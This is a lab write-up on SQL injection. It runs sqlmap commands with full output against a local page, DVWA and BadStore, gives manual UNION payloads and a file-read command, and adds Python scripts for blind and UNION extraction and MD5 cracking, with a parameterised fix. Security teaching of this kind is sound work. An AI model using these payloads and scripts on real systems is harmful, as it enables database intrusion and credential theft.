SQL Injection 2 (sqlmap)

Index

1. Local attack ................................................ 3
   A) Database server and version .............................. 3
   B) Database name ............................................ 5
   C) Tables ................................................... 6
   D) Columns .................................................. 7
   E) Table contents ........................................... 8
   F) Remaining databases ...................................... 9
   G) MySQL users ............................................. 10
2. DVWA ....................................................... 12
   Installation ............................................... 12
3. BadStore ................................................... 17
   A) Database server and version ............................. 17
   B) Database name ........................................... 19
   C) Tables .................................................. 20
   D) Columns ................................................. 21
   E) Remaining databases ..................................... 22
4. Acunetix ................................................... 23
   A) Database server and version ............................. 23
   B) Database name ........................................... 25
   C) Tables .................................................. 26
   D) Columns ................................................. 27

Iván Martín Valderas

Page 2

SQL Injection

1. Local attack

We are going to run a SQL injection attack against the page from the previous exercise, which issued a query against our MySQL database. It is located at http://localhost/ejerPHP/SQL_Injection/consulta.php. For this we use sqlmap from the command line.

A) Database server and version

First we find out the type of database server and its version. For this we use sqlmap's -b (--banner) option:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 -b

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 13:57:25

[13:57:26] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[13:57:26] [INFO] testing connection to the target url
[13:57:26] [INFO] testing if the url is stable, wait a few seconds
[13:57:27] [INFO] url is stable
[13:57:27] [INFO] testing if GET parameter 'id' is dynamic
[13:57:27] [INFO] confirming that GET parameter 'id' is dynamic
[13:57:27] [INFO] GET parameter 'id' is dynamic
[13:57:28] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[13:57:28] [INFO] testing sql injection on GET parameter 'id'
[13:57:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:57:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:57:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:57:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[13:57:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:57:38] [INFO] target url appears to be UNION injectable with 3 columns
[13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] Y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[13:57:44] [INFO] the back-end DBMS is MySQL
[13:57:44] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
banner:    '5.5.8'
[13:57:44] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 13:57:44

In this step the program tried each DBMS-specific payload family in turn to work out the type of server:

[...]
'MySQL > 5.0.11 ...'
'PostgreSQL > 8.1 ...'
'Microsoft SQL Server ...'
[...]

Three injection techniques worked on the id parameter (boolean-based blind, UNION with 3 columns, and time-based blind). Note the two version figures in the summary: "back-end DBMS: MySQL 5.0.11" is sqlmap's fingerprint, i.e. the payload class that succeeded ("MySQL > 5.0.11", the versions where SLEEP() exists), whereas the real server version is the one returned by the banner requested with -b: MySQL 5.5.8.


B) Database name

This is the first step towards extracting everything we can from the target, since from here on we go step by step deeper into the database. We obtain the name of the database the query refers to, that is, the current database, with --current-db:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --current-db

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 14:01:02

[14:01:02] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:01:02] [INFO] resuming injection data from session file
[14:01:02] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:01:02] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[...] (the same three injection points listed in step A)
[14:01:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:01:03] [INFO] fetching current database
current database:    'asir1'
[14:01:03] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:01:03

The database name is "asir1". Note that sqlmap made 0 new requests here for the injection points: it reused the session file from step A and only spent requests on the new data.

C) Tables

Once we have the database name, we can list the tables it contains with --tables, passing -D asir1 with the name obtained above:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --tables -D asir1

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 14:04:48

[14:04:48] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:04:48] [INFO] resuming injection data from session file
[14:04:48] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:04:48] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[...] (the same three injection points listed in step A)
[14:04:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:04:49] [INFO] fetching tables for database 'asir1'
[14:04:49] [INFO] the SQL query used returns 1 entries
Database: asir1
[1 table]
+----------+
| usuarios |
+----------+
[14:04:49] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:04:49

We get a single table: usuarios.


D) Columns

We list the columns of that table with --columns, naming the table with -T usuarios and the database with -D asir1:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --columns -T usuarios -D asir1

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 14:06:30

[14:06:30] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:06:30] [INFO] resuming injection data from session file
[14:06:30] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:06:30] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[...] (the same three injection points listed in step A)
[14:06:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:06:31] [INFO] fetching columns for table 'usuarios' on database 'asir1'
[14:06:31] [INFO] the SQL query used returns 3 entries
Database: asir1
Table: usuarios
[3 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| id       | int(10) unsigned |
| nonmbre  | varchar(50)      |
| password | varchar(50)      |
+----------+------------------+
[14:06:31] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:06:31

We have obtained the column names and their types. (The second column really is called "nonmbre": sqlmap reports names exactly as they exist in the schema, so the misspelling is in the table definition, not in the tool's output.)

E) Table contents

Finally we dump the rows of the table with --dump:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --dump -T usuarios -D asir1

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 14:07:28

[14:07:28] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:07:28] [INFO] resuming injection data from session file
[14:07:28] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:07:28] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[...] (the same three injection points listed in step A)
[14:07:28] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:07:29] [INFO] fetching columns for table 'usuarios' on database 'asir1'
[14:07:29] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\localhost\session': id, int(10) unsigned, nonmbre, varchar(50), password, varchar(50)
[14:07:29] [INFO] fetching entries for table 'usuarios' on database 'asir1'
[14:07:29] [INFO] the SQL query used returns 3 entries
Database: asir1
Table: usuarios
[3 entries]
+----+---------+----------+
| id | nonmbre | password |
+----+---------+----------+
| 2  | ivan    | ivanasir |
| 3  | luci    | luciasir |
| 1  | root    | asir2012 |
+----+---------+----------+

Now we have the complete usuarios table of the asir1 database. Note that the passwords are stored in clear text: anyone who gets this far through the injection obtains usable credentials directly, with nothing left to crack.


F) Remaining databases

With --dbs we list every database that the application's database user can see:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 14:08:22

[14:08:22] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:08:22] [INFO] resuming injection data from session file
[14:08:22] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:08:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[...] (the same three injection points listed in step A)
[14:08:22] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:08:22] [INFO] fetching database names
[14:08:22] [INFO] the SQL query used returns 8 entries
available databases [8]:
[*] asir1
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

Besides asir1 we can see MySQL's own schemas (information_schema, mysql, performance_schema), phpMyAdmin's database and several others. That the web application's database user can list, and therefore query, all of them is a first sign of excessive privileges; the next step confirms it.

G) MySQL users

With --users we list the accounts defined in the DBMS:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --users

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 14:10:03

[14:10:03] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:10:03] [INFO] resuming injection data from session file
[14:10:03] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:10:03] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[...] (the same three injection points listed in step A)
[14:10:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:10:03] [INFO] fetching database users
[14:10:03] [INFO] the SQL query used returns 58 entries
database management system users [4]:
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'


Apart from the anonymous account ''@'localhost' and phpMyAdmin's 'pma' user, the only accounts are root (on localhost and on 127.0.0.1): there is no dedicated, low-privilege user for the web application. Here lies one of the problems. We are using the root user that MySQL ships with by default to connect from PHP. If the application's SQL statements run as root, the injection inherits root's privileges, among them FILE, which lets us read files from the server's filesystem through LOAD_FILE() and write files with SELECT ... INTO OUTFILE, always within what the MySQL service account itself can access on the OS.

sqlmap exposes the read side as --read-file. For example, on a UNIX host we could retrieve the list of system accounts with:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --read-file /etc/passwd

(Two caveats: /etc/passwd holds account names, while the password hashes themselves live in /etc/shadow on modern systems; and the target in this exercise runs on Windows, as sqlmap reported in step A, so that path does not exist there. The command illustrates the technique rather than this particular host.)
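To make concrete what sqlmap did in steps A to G, the following Python script is an added example (it is not part of the original report nor of sqlmap itself). It rebuilds the usuarios table in an in-memory SQLite database with the rows dumped above (constructed data), reconstructs a hypothetical consulta.php that pastes the id parameter into the query text, decodes the CHAR() sequences of the UNION payload to show the marker strings sqlmap wraps around extracted data, and reimplements two of the three techniques sqlmap reported: boolean-based blind extraction (a binary search on each character behind "id=1 AND ...", which is what the detection payload id=1 AND 6656=6656 probes) and UNION extraction located by markers. SQLite stands in for MySQL, so CONCAT becomes ||, ASCII/SUBSTRING become unicode/substr and the trailing # comment becomes --; those are the only adaptations.

```python
import re
import sqlite3

# Constructed stand-in for asir1.usuarios, filled with the rows dumped in step E.
# SQLite replaces MySQL only so that this runs offline; the column really is
# spelled "nonmbre" in the dumped schema.
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
    CREATE TABLE usuarios (id INTEGER, nonmbre TEXT, password TEXT);
    INSERT INTO usuarios VALUES (2, 'ivan', 'ivanasir');
    INSERT INTO usuarios VALUES (3, 'luci', 'luciasir');
    INSERT INTO usuarios VALUES (1, 'root', 'asir2012');
""")


def consulta(id_param: str) -> list:
    """Hypothetical reconstruction of consulta.php (not the real source): the
    GET parameter 'id' is pasted into the SQL text, which is the injection
    point sqlmap found."""
    sql = "SELECT id, nonmbre, password FROM usuarios WHERE id=" + id_param
    try:
        return CONN.execute(sql).fetchall()
    except sqlite3.Error:
        return []  # the PHP page would simply render no rows


def decode_char_calls(payload: str) -> str:
    """Replace every CHAR(n,n,...) in a sqlmap payload with the string it
    builds, exposing the random markers sqlmap wraps around extracted data."""
    return re.sub(
        r"CHAR\(([\d,]+)\)",
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",")),
        payload,
    )


def oracle(condition: str) -> bool:
    """Boolean-based blind oracle: does 'id=1 AND <condition>' return the same
    page as 'id=1'? sqlmap's detection payload 'id=1 AND 6656=6656' is exactly
    this check with a tautology."""
    return consulta("1 AND " + condition) == consulta("1")


def blind_extract(expr: str, max_len: int = 64) -> str:
    """Recover the value of a scalar SQL expression one character at a time,
    binary-searching the code point of each position through the oracle.
    (MySQL: ASCII(SUBSTRING(...)); SQLite: unicode(substr(...)).)"""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            if oracle(f"unicode(substr(({expr}),{pos},1)) >= {mid}"):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:  # substr() past the end gives '' -> NULL -> every test false
            break
        out += chr(lo)
    return out


def union_extract(expr: str) -> str:
    """UNION-based extraction: a negative id empties the original result, the
    UNION row carries <expr> wrapped in the ':jrk:'/':lkb:' markers decoded
    from the payload above, and the markers locate it in the rendered page.
    (MySQL CONCAT(...) becomes || in SQLite; the # comment becomes --.)"""
    rows = consulta(f"-8382 UNION ALL SELECT ':jrk:' || ({expr}) || ':lkb:', NULL, NULL -- ")
    page = " ".join(str(c) for row in rows for c in row)
    m = re.search(r":jrk:(.*?):lkb:", page)
    return m.group(1) if m else ""


if __name__ == "__main__":
    payload = ("CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,"
               "108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58))")
    print(decode_char_calls(payload))
    print(oracle("6656=6656"), oracle("6656=6657"))
    print(blind_extract("SELECT password FROM usuarios WHERE nonmbre='root'"))
    print(union_extract("SELECT nonmbre FROM usuarios WHERE id=3"))
```

Decoding the payload shows that the UNION row renders as ":jrk:GYDMSVtKlt:lkb:": a random token between two short random markers, which is how sqlmap recognises its own injected data in the response before it asks for anything real. The blind route needs about seven oracle requests per character, which is why sqlmap prefers the UNION technique whenever the page reflects query results.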

2. DVWA

Damn Vulnerable Web App (the folder must be placed in htdocs).

Installation

Default username = admin
Default password = password

To access it, open http://127.0.0.1/dvwa/ in the browser.

We create the database (DVWA's setup page does this).


We check that the vulnerability exists by entering in the ID field:

1' or '1'='1' union select password, first_name from users where first_name='admin

The page answers:

ID: 1' or '1'='1' union select password, first_name from users where first_name='admin
First name: 5f4dcc3b5aa765d61d8327deb882cf99
Surname: admin

The single quote in the input closes the string literal the page builds around the id, the OR makes the original condition true, and the UNION appends a row of our choosing: the "First name" column now carries the admin user's password field and "Surname" its first_name, because that is the order in which we selected them. The unterminated 'admin at the end is closed by the quote the page itself appends.

http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA


We have obtained a password, but as we can see it is not the clear text: it is a 32-hex-digit MD5 hash (DVWA stores passwords as unsalted MD5). A hash is not "encoded" and cannot be decoded; what the web utilities do is look the hash up in precomputed tables, or hash candidate words until one matches. In this case 5f4dcc3b5aa765d61d8327deb882cf99 is the MD5 of "password", the default DVWA password noted in the Installation section above.

Next we try to pull all the passwords at once, since with the previous payload we would have to go one user at a time:

1' or '1'='1' union select first_name, password from users where '1'='1
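As an added example (not from the original report nor from DVWA's source), the following Python script reproduces the two DVWA payloads above against a constructed SQLite users table holding the default admin account with the MD5 hash shown on the page plus one more made-up row. lookup_vulnerable is a reconstruction of a "low" security lookup that interpolates the id inside single quotes, lookup_fixed is the same query with a bound parameter, and crack_md5 does what the "web utility" does: hash candidate words and compare, since MD5 cannot be reversed.

```python
import hashlib
import re
import sqlite3

# Constructed stand-in for DVWA's 'users' table: the default admin account with
# its password stored as the unsalted MD5 shown on the page, plus a second
# made-up row so that "all passwords at once" has something more to return.
GORDON_HASH = hashlib.md5(b"abc123").hexdigest()
CONN = sqlite3.connect(":memory:")
CONN.executescript(f"""
    CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin',  'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    INSERT INTO users VALUES (2, 'Gordon', 'Brown', '{GORDON_HASH}');
""")


def lookup_vulnerable(user_id: str) -> list:
    """Reconstruction of the 'low' DVWA lookup (hypothetical, not its source):
    the id is interpolated inside single quotes, so a quote in the input closes
    the literal and the rest of the input becomes SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return CONN.execute(sql).fetchall()


def lookup_fixed(user_id: str) -> list:
    """Same lookup with a bound parameter: the driver sends the input as data,
    so the payloads below are merely an id that matches nothing."""
    return CONN.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


# The two payloads from the DVWA section, verbatim.
ONE_USER = "1' or '1'='1' union select password, first_name from users where first_name='admin"
ALL_USERS = "1' or '1'='1' union select first_name, password from users where '1'='1"


def hashes_from_page(rows: list) -> dict:
    """Pick the (name, 32-hex-digit) pairs out of the ALL_USERS result, as a
    reader of the rendered page would."""
    return {name: value for name, value in rows
            if re.fullmatch(r"[0-9a-f]{32}", str(value))}


def crack_md5(digest: str, candidates):
    """What the 'web utility' really does: MD5 is not decodable, it is guessed
    by hashing candidates and comparing. Returns the match or None."""
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


if __name__ == "__main__":
    for first, last in lookup_vulnerable(ONE_USER):
        print(f"First name: {first}  Surname: {last}")
    wordlist = ["123456", "password", "abc123", "letmein"]
    for name, digest in hashes_from_page(lookup_vulnerable(ALL_USERS)).items():
        print(name, digest, "->", crack_md5(digest, wordlist))
    print("parameterised:", lookup_fixed(ONE_USER), lookup_fixed("1"))
```

With the vulnerable lookup, ONE_USER yields the hash in the "First name" position exactly as the page showed, and ALL_USERS yields one (first_name, hash) pair per user. The parameterised version returns nothing for either payload and the admin row for a plain "1": the fix is in how the query is built, not in filtering quotes.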


3. BadStore

If we type a double quote (") in the search field, the server answers with an SQL error message, which suggests that the search is vulnerable to SQL injection.

As in the first exercise, we follow the same steps.

A) Database server and version

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:02:41

[10:02:41] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:02:41] [INFO] testing connection to the target url
[10:02:41] [INFO] testing if the url is stable, wait a few seconds
[10:02:42] [INFO] url is stable
[10:02:42] [INFO] testing if GET parameter 'searchquery' is dynamic
[10:02:43] [WARNING] GET parameter 'searchquery' is not dynamic
[10:02:43] [INFO] heuristic test shows that GET parameter 'searchquery' might be injectable (possible DBMS: MySQL)
[10:02:43] [INFO] testing sql injection on GET parameter 'searchquery'
[10:02:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:02:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[10:02:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:02:57] [INFO] target url appears to be UNION injectable with 4 columns
[10:02:57] [INFO] GET parameter 'searchquery' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'searchquery' is vulnerable. Do you want to keep testing the others? [y/N] y

Here sqlmap has told us that the 'searchquery' parameter is vulnerable, that is, the search box where we typed the double quotes earlier is sent as a GET parameter into which we can inject SQL statements; it also asks whether we want to test the remaining parameters for vulnerabilities.

[10:03:05] [INFO] testing if GET parameter 'action' is dynamic
[10:03:05] [INFO] confirming that GET parameter 'action' is dynamic
[10:03:05] [INFO] GET parameter 'action' is dynamic
[10:03:05] [WARNING] heuristic test shows that GET parameter 'action' might not be injectable
[10:03:05] [INFO] testing sql injection on GET parameter 'action'
[10:03:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:17] [WARNING] GET parameter 'action' is not injectable
[10:03:17] [INFO] testing if GET parameter 'x' is dynamic
[10:03:17] [WARNING] GET parameter 'x' is not dynamic
[10:03:17] [WARNING] heuristic test shows that GET parameter 'x' might not be injectable
[10:03:17] [INFO] testing sql injection on GET parameter 'x'
[10:03:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:31] [WARNING] GET parameter 'x' is not injectable
[10:03:31] [INFO] testing if GET parameter 'y' is dynamic
[10:03:31] [WARNING] GET parameter 'y' is not dynamic
[10:03:31] [WARNING] heuristic test shows that GET parameter 'y' might not be injectable
[10:03:31] [INFO] testing sql injection on GET parameter 'y'
[10:03:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:44] [WARNING] GET parameter 'y' is not injectable
sqlmap identified the following injection points with a total of 380 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---
[10:03:45] [INFO] testing MySQL
[10:03:45] [INFO] confirming MySQL
[10:03:45] [INFO] the back-end DBMS is MySQL
[10:03:45] [INFO] fetching banner
web application technology: Apache 1.3.28
back-end DBMS: MySQL < 5.0.0
banner:    '4.1.7-standard'
[10:03:45] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:03:45

Only the search parameter is injectable, and only through a UNION with 4 columns (the injected SELECT must match the column count of the application's own query). The banner gives the real version, MySQL 4.1.7, and that matters for the following steps: MySQL before 5.0 has no information_schema, so sqlmap will not be able to read table and column names from a catalog and will have to guess them.

B) Database name

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --current-db

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:12:35

[10:12:35] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:12:35] [INFO] resuming injection data from session file
[10:12:35] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:12:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[...] (the same UNION injection point listed in step A)
[10:12:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:12:35] [INFO] fetching current database
current database:    'badstoredb'
[10:12:36] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:12:36

The database name is badstoredb.

C) Tables

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredb

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:20:13

[10:20:13] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:20:13] [INFO] resuming injection data from session file
[10:20:13] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:20:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[...] (the same UNION injection point listed in step A)
[10:20:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:20:14] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
do you want to use common table existance check? [Y/n/q] y
[10:20:21] [INFO] checking table existence using items from 'C:\sqlmap-0.9\sqlmap\txt\common-tables.txt'
[10:20:21] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[10:20:28] [WARNING] running in a single-thread mode. This could take a while.
[10:27:14] [INFO] retrieved: itemdb
Database: badstoredb
[1 table]
+--------+
| itemdb |
+--------+
[10:27:14] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:27:14

The table name is itemdb. Unlike the MySQL 5.5 target of section 1, sqlmap could not read the table names from information_schema here: it had to guess them from a wordlist (plus words scraped from the page) and test each candidate with a separate request, which took about seven minutes single-threaded and can only find names that appear in the list. Tables with unusual names remain hidden, so this result is a lower bound on the schema, not the whole of it.


D) Columns

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --columns -T itemdb -D badstoredb

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 10:29:00

[10:29:00] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:29:00] [INFO] resuming injection data from session file
[10:29:00] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:29:00] [INFO] resuming brute forced table name 'itemdb' from session file
[10:29:00] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
[...] (the same UNION injection point listed in step A)
[10:29:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:29:00] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
do you want to use common columns existance check? [Y/n/q] y
[10:29:03] [INFO] checking column existence using items from 'C:\sqlmap-0.9\sqlmap\txt\common-columns.txt'
please enter number of threads? [Enter for 1 (current)]
[10:29:05] [WARNING] running in a single-thread mode. This could take a while.
[10:29:36] [INFO] retrieved: price
[10:29:55] [INFO] retrieved: qty
Database: badstoredb
Table: itemdb
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| price  | numeric |
| qty    | numeric |
+--------+---------+
